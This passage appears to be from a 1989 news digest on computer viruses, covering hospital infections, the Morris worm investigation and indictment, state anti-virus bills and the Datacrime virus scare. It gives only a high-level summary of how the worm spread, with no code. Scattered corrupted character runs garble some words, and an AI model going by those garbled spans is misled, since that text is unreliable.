copies of itself while leaving other data alone. However, the +second virus inserted itself into programs and directories of patient +information and made the machines malfunction. + "No lasting harm was done by this," Juni wrote, because the hospital had +backups, "but there certainly was the potential." + Science writer Daniel Q. Haney of The Associated Press quoted Juni's letter as +saying about three-quarters of the programs stored in0te`jII@PCs were +infected. + Haney said Juni did not know the origin of the less harmful virus, "but the +more venal of the two apparently was on the hard disk of one of the computers +when the hospital bought it new. ... The virus spread from one computer to +another when a doctor used a word processing program on both machines while +writing a medical paper." + Juni said the hard disk in question was manufactured by CMS Enhancements of +Tustin, Calif. + CMS spokesman Ted James confirmed for AP that a virus was inadvertently put on +600 hard disks last October. + Says Haney, "The virus had contaminated a program used to format the hard +disks. ... It apparently got into the company's plant on a hard disk that had +been returned for servicing. James said that of the 600 virus-tainted disks, 200 +were shipped to dealers, and four were sold to customers." + James also said the virus was "as harmless as it's possible to be," that it +merely inserted a small piece of extra computer code on hard disks but did not +reproduce or tamper with other material on the disk. James told AP he did not +think the Michigan hospital's problems actually were caused by that virus. + --Charles Bowen + + + + +MORE HOSPITALS STRUCK BY VIRUS + + (March 23) + The latest computer virus attack, this one on hospital systems, apparently was +more far- reaching than originally thought. + As reported here, a radiologist wrote a letter to the New England Journal of +Medicine detailing how data on two Apple Macintoshes used by the William +Beaumont Hospital in Royal Oak, Mich., was altered by one or more computer +viruses. At least one of the viruses, he said, apparently traveled into the +system on a new hard disk the institution bought. + Now Science writer Rob Stein of United Press International says the virus -- +possibly another incarnation of the so-called "nVIR" virus -- infected computers +at three Michigan hospitals last fall. Besides the Royal Oak facility, computers +at another William Beaumont Hospital in Troy, Mich., were infected as were some +desktop units at the University of Michigan Medical Center in Ann Arbor. + Stein also quoted Paul Pomes, a virus expert at the Univershy of Illinois in +Champaign, as saying this was the first case he h@`YX.zJ +5Rh$Vkɭѕa computer used for patient care or diagnosis in a hospital. +However, he added such disruptions could become more common as personal +computers are used more widely in hospitals. + The virus did not harm any patients but reportedly did delay diagnoses by +shutting down computers, creating files of non-existent patients and garbling +names on patient records, which could have caused more serious problems. + Dr. Jack Juni, the radiology who reported the problem in the medical journal, +said the virus "definitely did affect care in delaying things and it could have +affected care in terms of losing this information completely." He added that if +patient information had been lost, the virus could have forced doctors to repeat +tests that involve exposing patients to radiation. Phony and garbled files could +have caused a mix-up in patient diagnosis. "This was information we were using +to base diagnoses on," he said. "We were lucky and caught it in time." + Juni said the virus surfaced when a computer used to display images used to +diagnose cancer and other diseases began to malfunction at the 250-bed Troy +hospital last August. In October, Juni discovered a virus in the computer in the +Troy hospital. The next day, he found the same virs2in a similar computer in +the 1,200-bed Royal Oak facility. + As noted, the virus seems to have gotten into the systems through a new hard +disk the hospitals bought, then spread via floppy disks. + The provider of the disk, CMS Enhancements Inc. of Tustin, Calif., said it +found a virus in a number of disks, removed the virus from the disks that had +not been sent to customers and sent replacement programs to distributors that +had received some 200 similar disks that already had been shipped. + However, CMS spokesman Ted James described the virus his company found as +harmless, adding he doubted it could have caused the problems Juni described. +"It was a simple non-harmful virus," James told UPI, "that had been created by a +software programmer as a demonstration of how viruses can infect a computer." + Juni, however, maintains the version of the virus he discovered was a mutant, +damaging version of what originally had been written as a harmless virus known +as "nVIR." He added he also found a second virus that apparently was harmless. +He did not know where the second virus originated. + --Charles Bowen + + +GOVERNMENT PLANS FOR ANTI-VIRUS CENTERS + + (March 24) + Federal anti-virus response centers that will provide authentic solutions to +virus attacks as they occur will be developed by the National Institute of +Standards and Technology, reports Government Computer News. + The centers will rely on unclassified material throughout the federal +government and provide common services and communication among other response +centers. + NIST will urge agencies to establish a network of centers, each of which will +service a different use or technological constituency. They will offer +emergency response support to users, including problem-solving and +identification of resources. GCN notes they will also aid in routine information +sharing and help identify problems not considered immediately dangerous, but +which can make users or a system vulnerable to sabotage. + A prototype center called the Computer Emergency Response Team is already +operational at the Defense Advanced Research Projects Agency and will serve as a +model for the others. + Although NIST and the Department of Energy will provide start-up funds, each +agency will have to financially support its response center. + --Cathryn Conroy + + + +MORRIS "WORM" WAS NEITHER GENIUS NOR CRIMINAL, COMMISSION SAYS + + (April 2) + A Cornell University investigating commission says 23- year-old graduate +student Robert Morris acted alone in creating the rogue program that infected up +to 6,000 networked military computers last Nov. 2 and 3. + In addition, the panel's 45- page report, obtained yesterday by The Associated +Press, further concludes that while the programming by the Arnold, Md., student +was not the work of a genius, it also was not the act of a criminal. + AP says Morris, who is on a leave of absence from Cornell's doctoral program, +declined to be interviewed by the investigating commission. + Speculating on why Morris cre{fd the rogue program, the panel wrote, "It may +simply have been the unfocused intellectual meanderings of a hacker completely +absorbed with his creation and unharnessed by considerations of explicit purpose +or potential effect." + Incidentally, the panel also pointed out what others in the industry observed +last November, that the program technically was not a "virus," which inserts +itself into a host program to reproduce, but actually was a "worm," an +independent program that endlessly duplicates itself once placed in a computer +system. + As reported, Morris still is being investigated by a federal grand jury in +Syracuse, N.Y., and by the US Justice Department in Washington, D.C. + AP says the university commission rejected the idea that Morris created the +worm to point out the need for greater computer security. Says the report, "This +was an accidental byproduct of the event and the resulting display of media +interest. Society does not condone burglary on the grounds that it heightens +concern about safety and security." + The report said, "It is no act of genius or heroism to exploit such +weaknesses," adding that Morris, a first-year student, should have reported the +flaws he discovered, which would "have been the most responsible course of +action, and one that was supported by his colleagues." + The group also believes the program could have been created by many students, +graduate or undergraduate, particularly if they were aware of the Cornell +system's well-known security flaws. + The wire service quotes thgeport`.ձѥjɥBpKwanted to +spread the worm without detection, but did not want to clog the computers. In +that regard, the commission said Morris clearly should have known the worm would +replicate uncontrollably and thus had a "reckless disregard" for the +consequences. + However, the Cornell panel also disputed some industry claims that the Morris +program caused about $96 million in damage, "especially considering no work or +data were irretrievably lost." It said the greatest impact may be a loss of +trust among scholars who use the research network. + AP says the report found that computer science professionals seem to favor +"strong disciplinary measures," but the commission said punishment "should not +be so stern as to damage permanently the perpetrator's career." + --Charles Bowen + + +ETHICS STUDY NEEDED IN COMPUTING + + (April 4) + A Cornell University panel says education is more effective than security in +preventing students from planting rogue programs in research networks. + As reported earlier, the panel investigated the work of Cornell graduate +student Robert Morris Jr., concluding the 23-year-old Maryland man acted alone +and never intended permanent damage when he inserted a "worm" into a nationwide +research network last November. + Speaking at a press conference late yesterday in Ithaca, N.Y., Cornell Provost +Robert Barker said, "One of the important aspects of making the report public is +that we can now use it on campus in a much fuller way than we have before." + United Press International says Cornell has taken steps to improve its +computer security since the incident, but members of the committee noted that +money spent on building "higher fences" was money that could not be spent on +education. + Barker said Cornell will place a greater emphasis on educating its students on +computer ethics, and might use the recent case as an example, instead of relying +primarily on increased security to prevent similar incidents. Said the provost, +"It was the security of the national systems, and not of Cornell, that was the +problem here." + As reported, Morris's worm infected up to 6,000 Unix-based computers across +the country. A federal grand jury in Syracuse, N.Y., investigated the case and +Justice Department officials in Washington now are debating whether to prosecute +Morris. + --Charles Bowen + + + +ILLINOIS STUDIES VIRUS LAW + + (April 15) + The virus panic in some state legislatures continues as anti- virus +legislation is introduced in Illinois. + Illinois House Bill 498 has been drafted by Rep. Ellis B. Levin (D-Chicago) to +provide criminal penalties for loosing a so-called computer virus upon the +public. The bill is similar to one that has been introduced in Congress. + Rep. Levin's bill provides that a person commits "'computer tampering by +program' when he knowingly: inserts into a computer program information or +commands which, when the program is run, causes or is designed to cause the +loss, damage or disruption of a computer or its data, programs or property to +another person; or provides or offers such a program to another person." + Conviction under the legislation would result in a felony. A second +conviction would bring harsher penalties. + Currently, the bill is awaiting a hearing in the Illinois' House Judiciary II +Committee. It is expected that testimony on HB 498 will be scheduled sometime +during April. + --James Moran + + +ERRORS, NOT CRACKERS, MAIN THREAT + + (April 28) + A panel of computer security experts has concluded that careless users pose a +greater threat than malicious saboteurs to corporate and government computer +networks. + Citing the well-publicized allegations that Cornell University graduate +student Robert T. Morris Jr. created a worm program last November that swept +through some 6,000 networked systems, Robert H. Courtney Jr. commented, "It was +a network that no one attempted to secure." + According to business writer Heather Clancy of United Press International, +Courtney, president of Robert Courtney Inc. computer security firm, said the +openness of Internet was the primary reason it was popular among computer +crackers, some of whom are less talented or more careless than others. + "People making mistakes are going to remain our single biggest security +problems," he said. "Crooks can never, ever catch up." + Sharing the panel discussion in New York, Dennis D. Steinauer, a computer +scientist with the National Institute for Standards and Technologies, added that +network users should not rely only on technological solutions for security +breaks. + "Not everyone needs all security products and mechanisms out there," he said. +"The market is not as large as it is for networking equipment in general." He +added that a standard set of program guidelines, applicable to all types of +networks, should be created to prevent mishaps. "There has been a tremendous +amount of work in computer (operating) standards. The same thing is now +happening in security." + Fellow panelist Leslie Forman, AT&T's division manager for the data systems +group, said companies can insure against possible security problems by training +employees how to use computers properly and tracking users to make sure they +aren't making potentially destructive errors. "It's not a single home run that +is going to produce security in a network," she said. "It's a lot of little +bunts." + --Charles Bowen + + +EXPERTS TESTIFY ON COMPUTER CRIME + + (May 16) + Electronic "burglar alarms" are needed to protect US military and civilian +qomputer systems, Clifford Stoll, an astronomer at the Harvard- Smithsonian +Center for Astrophysics, told a Senate Judiciary subcommittee hearing on +computer crimes, reports United Press International. + Stoll was the alert scientist who detected a 75-cent accounting error in +August 1986 in a computer program at Lawrence Berkeley Laboratory that led him +to discover a nationwide computer system had been electronically invaded by West +Germans. + "This was a thief stealing information from our country," he said. "It deeply +bothers me that there are reprobates who say, `I will steal anything I can and +sell it to whoever I want to.' It opened my eyes." + Following his discovery, Stoll was so immersed in monitoring the illegal +activity that he was unable to do any astronomy work for a year. + "People kind of look at this as a prank," Stoll said. "It's kind of funny on +the one hand. But it's people's work that's getting wiped out." + The West German computer criminals, who were later determined to have been +working for Soviet intelligence, searched the US computer network for +information on the Strategic Defense Initiative, the North American Defense +Command and the US KH-11 spy satellite. They also withdrew information from +military computers in Alabama and California, although no classified information +was on any of the computer systems. + William Sessions, FBI director, also appeared before the Senate subcommittee +and said the bureau is setting up a team to concentrate on the problem. + He explained that computer crimes are among "the most elusive to investigate" +since they are often "invisible." The FBI has trained more than 500 agents in +this area. + UPI notes that Sessions agreed to submit his recommendations to Sen. Patrick +Leahy (D-Vt.), the subcommittee chairman, for new laws that could be used to +protect sensitive computer networks from viruses. Currently, there are no +federal laws barring computer viruses. + The FBI is working with other federal agencies to assess the threat of such +crimes to business and national security. + William Bayes, assistant FBI director, told the senators he likens a computes +to a house with locks on the door. He explained that he has placed a burglar +alarm on his computer at Berkeley, programming it to phone him when someone +tries to enter it. He said more computer burglar alarms may be needed. + -- Cathryn Conroy + + +MASS. CONSIDERS NEW INTRUSION LAW + + (May 21) + In Boston, a state senator has offered a bill that would make it a violation +of Massachusetts law to enter a computer without authorization. It also would +level penalties against those caught planting so-called computer "viruses." + Sen. William Keating, the bill's sponsor, told The Associated Press his +measure considers this new category of crime to be analogous to breaking into a +building. + "It's an attempt," Keating added, "to put on the statutes a law that would +penalize people for destruction or deliberate modification or interference with +computer properties. It clarifies the criminal nature of the wrongdoing and, I +think, in that sense serves as a deterrent and makes clear that this kind of +behavior is criminal activity." + The senator credits a constituent, Elissa Royal, with the idea for the bill. +Royal, whose background is in hospital administration, told AP, "I heard about +(computer) viruses on the news. My first thought was the clinical pathology +program. Our doctors would look at it and make all these decisions without +looking at the hard copy. I thought, what if some malevolent, bright little +hacker got into the system and changed the information? How many people would be +injured or die?" + Keating's bill would increase penalties depending on whether the attacker +merely entered a computer, interfered with its operations or destroyed data. In +the most serious case, a person found guilty of knowingly releasing a virus +would be subject to a maximum of 10 years in prison or a $25,000 fine. + AP says the bill is pending in committee, as staff members are refining its +language to carefully define the term "virus." + --Charles Bowen + + +COMPUTER VACCINE MARKET THRIVES ON USER FEAR + + (May 23) + The computer protection market is thriving. The reason? Fear. Fear of the +spread of computer viruses and worms has caused a boom in products that are +designed to protect unwitting users from the hazards of high- tech diseases. + According to the Dallas Morning News, there is a surging cottage industry +devoted to creating "flu shots" and "vaccines" in the form of software and +hardware; however, many of these cures are nothing more than placebos. + "There's a protection racket springing up," said Laura A. DiDio, senior editor +of Network World, the trade publication that sponsored a recent executive +roundtable conference in Dallas on "Network Terrorism." + Last year alone, American businesses lost a whopping $555.5 million, 930 years +of human endeavor and 15 years of computer time from unauthorized access to +computers, according to statistics released by the National Center for computer +Crime Data in Los Angeles, Calif. + The most difficult systems to protect against viruses are computer networks +since they distribute computing power throughout an organization. Despite the +threat, sales are thriving. Market Intelligence Research says sales of sonalM +comutѶ5ݽqequipment grew 50 percent last year and are expected to +grow another 41 percent this year to $929.5 million. + Meanwhile, the Computer Virus Industry Association says that the number of +computer devices infected by viruses in a given month grew last year from about +1,000 in January to nearly 20,000 in November and remained above 15,000 in +December. + -- Cathryn Conroy + + + +MORRIS SUSPENDED FROM CORNELL + + (May 25) + Robert T. Morris, the 23-year-old graduate student whose "worm" program +brought down some 6,000 networked government and scientific computers last +November, has been suspended from Cornell University. + The New York Times reported today Cornell officials have ruled that Morris, a +first-year graduate student, violated the school's Code of Academic Integrity. + The paper quoted a May 16 letter to Morris in which Alison P. Casarett, dean +of Cornell's graduate school, said the young man will be suspended until the +beginning of the 1990 fall semester. Casarett added that if Morris wants to +reapply, the decision to readmit him will be made by the graduate school's +computer science faculty. + The Times says the letter further states the decision to suspend Morris was an +academic ruling and was not related to any criminal charges Morris might face. + No criminal charges have been levied against Morris so far. A federal grand +jury earlier forwarded its recommendations to the US Justice Department, but no +action has been taken. + As reported last month, a Cornell University commission has said Morris' +action in creating and accidentally releasing the worm program into the ARPANET +system of Unix-based computers at universities, private corporations and +military installations was "a juvenile act that ignored the clear potential +consequences." + While the Morris worm did not destroy data, it forced the shut- down of many +of the systems for up to two days while they were cleared of the rogue program. + --Charles Bowen + + +PENDING COMPUTER LAWS CRITICIZED + + (June 18) + Computer attorney Jonathan Wallace says that the virus hystYZXѥhasn't +quieted down and that legislation that will be reintroduced in Congress this +year is vague and poorly drafted. + Noting that at least one state, New York, is also considering similar +legislation, Wallace says that legislators may have overlooked existing laws +that apply to "software weapons." In a newsletter sent out to clients, Wallace +notes p(Xѡthe Electronic Communications Privacy Act (ECPA) and the +Computer Fraud and Abuse Act (CFAA) cover the vast majority of software crimes. + Wallace points out that both the ECPA and the CFAA already impose criminal +penalties on illegal actions. Even the Senate Judiciary Committee has refutted +the idea that more federal laws are needed. "Why don't we give existing laws a +chance to work, before rushing off to create new ones," Wallace asks. + Wallace is the editor of Computer Li!Letter and is an Assistant System +Administrator on CompuServe's Legal Forum (GO LAWSIG). + --James Moran + + +NEW VIRUS HITS THAI COMPUTERS + + (June 27) + A newspaper in Bangkok is reporting that a new computer virus, said to be the +most destructive yet discovered, has struck computer systems in Thailand. + According to the Newsbytes News Service, computer security specialist John +Dehaven has told The Bangkok Post, "This is a very subtle virus that can lay +dormant, literally, for years." + The wire service says that two Thai banks and several faculties at +Chulalongkorn University were hit by the rogue program -- called the "Israeli +virus," because it was first detected there -- at the beginning of last month. +Newsbytes says the infection spreads quickly through any computer once it is +activated. + --Charles Bowen + + + +CONGRESS STUDIES COMPUTER VIRUSES + + (July 21) + The Congress is taking a hard look at a new report that says major computer +networks remain vulnerable to computer viruses that are capable of crippling +communications and stopping the nation's telecommunications infrastructure dead +in its tracks. + Rep. Edward Markey (D-Mass.), chairman of the House telecommunications +subcommittee, told a hearing earlier this week that federal legislation may be +needed to ease the threats posed by computer viruses. + "The risk and fear of computer-based sabotage must be reduced to an acceptable +level before we can reasonably expect our national networks to accomplish the +purposes for which they were created," Markey said during a hearing Wednesday on +the new congressional study. + "We must develop policies that ensure (network's) secure operation and the +individuals' rights to privacy as computer network technologies and applications +proliferate," he added. + The report by the General Accounting Office examined last year's virus attack +that shut down the massive Internet system, which links 60,000 university, +government and industry research computers. + The GAO found that Internet and other similar systems remain open to attack +with much more serious results than the temporary shutdown experienced by +Internet. + The GAO warned that the Internet virus, a "worm" which recopied itself until +it exhausted all of the systems available memory, was relatively mild compared +to other more destructive viruses. + "A few changes to the virus program could have resulted in widespread damage +and compromise," the GAO report said. + "With a slightly enhanced program, the virus could have erased files on +infected computers or remained undetected for weeks, surreptitiously changing +information on computer files," the report continued. + The GAO recommended the president's science advisor and the Office of Science +and Technology Policy should take the lead in developing new security for +Internet. + In addition, the report said Congress should consider changes to the Computer +Fraud and Abuse Act of 1986, or the Wire Fraud Act, to make it easier to bring +charges against computer saboteurs. + Joining in sounding the alarm at the hearing was John Landry, executive vice +president of Cullinet Software of Westwood, Mass., who spoke on behalf of +ADAPSO. + "The range of threats posed by viruses, worms and their kin is limited only by +the destructive imagination of their authors," Landry said. "Existing computer +security systems often provide only minimal protection agaifu a determined +attack." + Landry agreed the Internet attack could have been much worse. He said viruses +have been found that can modify data and corrupt information in computers by +means as simple as moving decimal points one place to the left or right. + One recently discovered virus, he said, can increase disk access speed, +resulting in the wearing out of disk drives. They also have been linked to +"embezzlement, fraud, industrial espionage and, more recently, international +political espionage," he said. + "Virus attacks can be life threatening," Landry said, citing a recent attack +on a computer used to control a medical experiment. "The risk of loss of life +resulting from infections of airline traffic control or nuclear plant monitoring +systems is easily imaginable," he said. + Landry said ADAPSO endorses the congressional drive toward tightening existing +law to ensure that computer viruses are covered along with other computer +abuses. + --J. Scott Orr + + + +GLOSSARY OF VIRUS-RELATED TERMS + + (July 21) + Until last year's computer virus attack on the massive Internet network made +headlines, computer sabotage attracted little attention outside computer and +telecommunications circles. + Today "computer virus" has become a blanket term covering a wide range of +software threats. + ADAPSO, the computer software and services industry association, believes the +term has been thrown around a little too loosely. Here, then, is ADAPSO's +computer virus glossary: + -:- COMPUTER VIRUS, a computer program that attaches itself to a legitimate, +executable program, then reproduces itself when the program is run. + -:- TROJAN HORSE, a piece of unauthorized code hidden within a legitimate +program that, like a virus, may execute immediately or be linked to a certain +time or event. A trojan horse, however, does not self-replicate. + -:- WORM, an infection that enters a computer system, typically through a +security loophole, and searches for idle computer memory. As in the Internet +case, the worm recopies itself to use up available memory. + -:- TRAPDOOR, a program written to provide future access to computer systems. +These are typical entryways for worms. + -:- TIME BOMB, a set of computer instructions entered into a system or piece +of software that are designed to go off at a predetermined time. April Fool's +Day and Friday the 13th have been popular times for time bomb's to go off. + -:- LOGIC BOMB, similar to a time bomb, but linked instead to a certain event, +such as the execution of a particular sequence of commands. + -:- CHAOS CLUB, a West German orc!ization that some have alleged was fnmed +to wreak havoc on computer systems through the use of viruses and their kin. + --J. Scott Orr + + + +MORRIS INDICTED IN WORM INCIDENT + + (July 27) + A federal grand jury has indicted the 24-year-old Cornell University graduate +student who is alleged to have released a "worm" program that temporarily +crippled the massive Internet computer network last November. + Robert Tappan Morris of Arnold, Md., becomes the first person to be indicted +under the federal Computer Fraud and Abuse Act of 1986 in connection with the +spread of a computer virus. + In convicted, Morris faces a maximum sentence of five years in federal prison +and a $250,000 fine. Morris' attorney, Thomas A. Guidoboni, said his client will +fight the charges. + The virus, a worm that sought out unused memory throughout the system and +recopied itself to fill the vacant space, infected at least 6,000 computers +nationwide. Internet is an unclassified, multinetwork system connecting 500 +networks and more than 60,000 computers around the world. + The indictment, handed up yesterday in Syracuse, N.Y., charges Morris +"intentionally and without authorization, accessed ... federal interest +computers." + The action, the indictment continued, "prevented the authorized use of one or +more of these federal interest computers and thereby caused a loss to one or +more others of a value aggregating $1,000 or more." + The indictment said the illegally accessed computers included those at the +University of California at Berkeley, the Massachusetts Institute of Technology, +the National Aeronautics and Space Administration, Purdue University and the US +Air Force Base Logistics Command at Wright Paterson Air Force Base in Dayton, +Ohio. + "Mr. Morris will enter a plea of not guilty and contest the charge against +him," Guidoboni said. He said his client "looks forward to his eventual +vindication and his return to a normal life." + Morris, a Harvard graduate and computer science graduate student at Cornell, +is about to begin a one-year suspension from Cornell that stemmed from the +incident. His father is chief computer scientist for the National Computer +Security Center near Baltimore. + The indictment comes less than a week after the General Accounting Office +found that Internet and other similar systems remain open to attack with much +more serious results than the temporary shutdown experienced last year. + The GAO warned the Internet virus was relatively mild compared to other more +destructive viruses. It went on to recommend the President's Science Advisor and +the Office of Science and Technology Policy take the lead in developing new +security for Internet. + In addition, the report said Congress should consider changes to the Computer +Fraud and Abuse Act, or the Wire Fraud Act, to make it easier to bring charges +against computer saboteurs. + The GAO said the Internet worm spread largely by exploiting security holes in +system software based on the Berkeley Software Distribution Unix system, the +most commonly used operating system on Internet. + The report from the GAO said the virus moved with startling speed. It was +first detected at 9 p.m. on Nov. 2. Within an hour it had spread to multiple +sites and by the next morning had infected thousands of systems. + According to GAO, the virus had four methods of attack. It used: + -:- A debugging feature of the "Sendmail" utility program to allow the sending +of an executable program. After issuing a debug command, the virus gave orders +to copy itself. + -:- A hole in another utility program -- "Fingerd," which allows users to +obtain public information about other users -- to move on to distant computers. + -:- Different methods to guess at user passwords. Once successful, the virus +"masqueraded" as a legitimate user to spread and access other computers. + -:- "Trusted host" features to spread quickly though local networks once one +computer was penetrated. + --J. Scott Orr + + + + +RESEARCHER UNCOVERS OCT. 12 VIRUS + + (July 31) + An official with a British firm that markets anti-virus software says the +company has uncovered a new virus called "Datacrime" is set to attack MS-DOS +systems starting Ot< 12. + Dr. Jan Hruska of Sophos UK tells Computergram International the virus +apparently appends itself to .COM (command) files on MS-DOS systems. + "Operating on a trigger mechanism," CI says, "the virus reformats track 0 of +the hard disk on or after Oct. 12. It has no year check and so will remain +active from Oct. 12 onwards destroying or losing programs and data." + Hruska told the publication this is a relatively new virus and that its +encrypted form reveals its name ("Datacrime") and its date of release, last +March 1. + Sophos markets a program called Vaccine version 4 designed to detect known +viruses. + --Charles Bowen + + + +MORRIS TO PLEAD INNOCENT + + (Aug. 2) + Robert T. Morris Jr., the former Cornell University graduate student who was +indicted last week by a federal grand jury, will plead innocent in federal court +to charges he planted a computer worm that wrecked havoc with some 6,000 +computers nationwide, reports United Press International. + As reported, the 24-year-old Arnold, Md., resident was indicted by the grand +jury on charges of breaking a federal statute by gaining unauthorized access to +a nationwide computer network and causing damage in excess of $1,000. + Both federal investigators and a Cornell University panel claim Morris created +the computer worm, which spread from the Cornell campus in Ithaca, N.Y., on Nov. +2 to computers around the country, notes UPI. + The worm infiltrated a Department of Defense computer system and forced many +federal and university computers to shut down. The exact amount of damage has +not been determined. + If convicted, Morris could be sent to prison for five years and fined up to +$250,000. In addition, the judge could order him to make restitution to those +who were adversely affected by the incident. + -- Cathryn Conroy + + + +NIST FORMS COMPUTER SECURITY NETWORK + + (Aug. 3) + The National Institute of Standards and Technology is working with other +federal agencies to establish a government-wide information network on security +incidents and issues, reports Government Computer News. + Organized by NIST's Computer Security Division, the network would supply the +latest information to agencies on security threats, develop a program to report +and assess security incidents as well as offer assistance. + Dennis Steinauer, evaluation group manager of the Computer Security Division, +said the plan is a response to the communications problems federal agencies +suffered during last November's worm attack on Internet b9 Jornell University +graduate student Robert T. Morris Jr. + In addition to NIST, the departments of Energy, Justice and Transportation as +well as the National Science Foundation and NASA are participating in the +project, which calls for each agency to organize a security incident response +and resource center. + NIST's network would connect the centers electronically, allowing them to +communicate with one another. Steinauer said he wants to set up a master +database of contacts, phone numbers and fax numbers to ensure communications. + One aspect of the plan calls for each center to become expert in some specific +area of the technology, such as personal computers, local area networks or +multiuser hosts. + "The answer is not some monolithic, centralized command center for +government," Steinauer told GCN. "Problems occur in specific user or technology +communities, and we see the solutions evolving where the reaction is by people +who know the user community and the environment." + He explained that the Computer Security Act has helped increase security +awareness within the government, but the emergence of computer viruses, worms +and other sophisticated threats has demonstrated the need for more advanced +security tools. + -- Cathryn Conroy + + +AUSTRALIAN CHARGED WITH CRACKING + + (Aug. 14) + Australia is reporting its first computer cracking arrest. A Melbourne student +is charged with computer trespass and attempted criminal damage. + Authorities allege 32-year-old Deon Barylak was seen loading a personal +computer with a disk that was later found to possess a computer virus. + "Fortunately, it was stopped before it could spread, which is why the charge +was only attempted criminal damage," senior detective Maurice Lynn told Gavin +Atkins for a report in Newsbytes News Service. + The wire service said Barylak could face a maximum of 100 years' jail and a +fine. + Also police expect to make further arrests in connection with the case. +Authorities said Barylak also faces charges of possessing computer equipment +allegedly stolen from a community center. + --Charles Bowen + + +INTERNET VIRUS BACK? + + (Sept. 4) + Apparently, neither the threat of criminal sanctions nor the hazards of +investigation by the FBI is enough to keep the Internet computer communications +network secure from intrusion. The Department of Defense agency responsible for +monitoring Internet security has issued a warning that unauthorized system +activity recently has been detected at a number of sites. + The Computer Emergency Response Team (CERT) says that the activity has been +evident for some months and that security on some networked computers may have +been compromised. In a warning broadcast to the Internet, CERT says that the +problem is spreading. + Internet first came to general attention when a came to much of the computing +communities attention when a 23-year-old Cornell University student was said to +be responsible for inserting a software "worm" into the network. The Department +of Defense's Advanced Project Agency network (ARPANET) also was infected and +CERT was formed to safeguard networks used or accessed by DoD emplyees and +contractors. + In its warning about recent intrusions, CERT says that several computers have +had their network communications programs replaced with hacked versions that +surreptitiously capture passwords used on remote systems. + "It appears that access has been gained to many of the machines which have +appeared in some of these session logs," says a broadcast CERT warning. "As a +first step, frequent telnet [communications program] users should change their +passwords immediately. While there is no cause for panic, there are a number of +things that system administrators can do to detect whether the security on their +machines has been compromised using this approach and to tighten security on +their systems where necessary." + CERT went on to suggest a number of steps that could be taken to verify the +authenticity of existing programs on any individual UNIX computer. Among those +was a suggestion to reload programs from original installation media. + --James Moran + + +AIR FORCE WARNS ITS BASES OF POSSIBLE "COLUMBUS DAY VIRUS" + + (Sept. 10) + The US Air Force has warned its bases across the country about a possible +computer virus reportedly set to strike MS-DOS systems Oct. 12. + Warning of the so-called "Columbus Day virus" was issued by the Air Force +Communications Command at Scott Air Force Base, Ill., at the request of the +Office of Special Investigations. + OSI spokesman Sgt. Mike Grinnell in Washington, D.C., told David Tortorano of +United Press International the advisory was issued so computer operators could +guard against the alleged virus. "We're warning the military about this," +Grinnell said, "but anybody that uses MS-DOS systems can be affected." + As reported here July 31, Dr. Jan Hruska, an official with a British firm +called Sophos UK, which markets anti-virus software, said his company had +uncovered a new virus called "Datacrime." Hruska told Computergram International +at the time that the virus apparently appends itself to .COM (command) files on +MS-DOS systems. + Said CI, "Operating on a trigger mechanism, the virus reformats track 0 of the +hard disk on or after Oct. 12. It has no year check and so will remain active +from Oct. 12 onwards destroying or losing programs and data." Hruska told the +publication this was a relatively new virus and that its encrypted form revealed +its name ("Datacrime") and its date of release, last March 1. + Meanwhile, Air Force spokeswoman Lynn Helmintoller at Hurlburt Field near Fort +Walton Beach, Fla., told UPI that computer operators there had been directed to +begin making backup copies of files on floppy disks just in case. She said the +warning was received at the base Aug. 28. + Staff Sgt. Carl Shogren, in charge of the small computer technology center at +Hurlburt, told Tortorano no classified data would be affected by the possible +virus attack because the disks used for classified work are different from those +that might be struck. + UPI quoted officials at Scott Air Force Base as saying the warning was sent to +every base with a communications command unit, but that they did not know how +many bases were involved. + --Charles Bowen + + +COMPUTER VIRUSES PLAGUE CONGRESS + + (Sept. 11) + Although Congress recently passed the Computer Security Act to force federal +agencies to guard against high-tech break- ins and computer viruses, the +legislators may soon realize they made a costly mistake. The law applies to all +federal agencies -- except Congress itself. And according to Government +Computer News, Capitol Hill has been the victim of several recent virus attacks. + One virus, for instance, emerged about a year ago in the Apple Macintosh +computers of several House offices causing unexplained system crashes. A steep +bill of some $100,000 was incurred before experts were confident the plague, now +known as Scores, was stopped. However, it does still lurk in the depths of the +computers, notes GCN, causing occasional malfunctions. + Dave Gaydos, Congress' computer security manager, says the sources of many +viruses may never be known, since some 10,000 programmers are capable of +producing them. + Capitol Hill legislators and staff members are only now becoming aware of the +potential danger of viruses as more offices are exploring ways to connect with +online database services and with each other through local area networks. + GCN reports that last February, a California congressional office was the +victim of a virus, caught while using a so-called vaccine program meant to +detect intruders into the system. + "I used to laugh about viruses," said Dewayne Basnett, a systems specialist on +Capitol Hill. "But now when you ask me about them, I get very angry. I think +of all the time and effort expended to repair the damage they do." + According to GCN, many of the 3,000 House employees with computers are +ignorant of the risks and unable to take basic precautions. Although various +computer specialists are trying to inform Hill users of computer security issues +and offer training sessions, there is no broad support from the legislators +themselves for such actions. + "We are working to alert people to the dangers," said Gaydos, "but it may take +an incident like a destructive virus to move [Congress] to take precautions." + -- Cathryn Conroy + + + +VIRUS HITS AUSTRALIA + + (Sept. 12) + Australian authorities are said to be confused about the origin of a supposed +computer virus that has been making the rounds of computer installations in the +South Pacific. An Australian newspaper, The Dominion, says that sensitive data +in Defense Department computers has been destroyed by the virus. + Dubbed the Marijuana virus because of the pro-drug message that is displayed +before any data is erased, it is thought that the misbehaving bug originated in +New Zealand. Some have even suggested that the program was purposely introduced +into Australian Defense computers by agents of New Zealand, a contention that a +Defense Department spokesman branded as "irresponsible." The two South Pacific +nations have had strong disagreements about defense matters, including recent +joint maneuvers in the area by Australian and US forces. + A more likely explanation for the intrusion into Defense computers is the +likelihood that Australian security specialists were examining the virus when +they inadvertently released it into their own security system. The Marijuana +virus is known to have been infecting computers in the country for at least +three months and its only known appearance in government computers occurred in a +Defense sub-department responsible for the investigation and prevention of +computer viruses. + --James Moran + + + +VIRUS THREAT ABSURDLY OVERBLOWN, SAY EXPERTS + + (Sept. 18) + The so-called "Columbus Day Virus" purportedly set to destructively attack +MS-DOS computers on Oct. 13 has computer users -- including the US military -- +scampering to protect their machines. But according to The Washington Post, the +threat is absurdly overblown with less than 10 verified sightings of the virus +in a country with tens of millions of computers. + "At this point, the panic seems to have been more destructive than any virus +itself," said Kenneth R. Van Wyk, a security specialist at Carnegie-Mellon +University's Software Engineering Institute, who has been taking some 20 phone +calls daily from callers seeking advice on the subject. + Bill Vance, director of secure systems for IBM Corp., told The Post, "If it +was out there in any number, it would be spreading and be more noticeable." + He predicted Oct. 13 is not likely to be "a major event." + As reported in Online Today, this latest virus goes by several names, +including Datacrime, Friday the 13th and Columbus Day. It lies dormant and 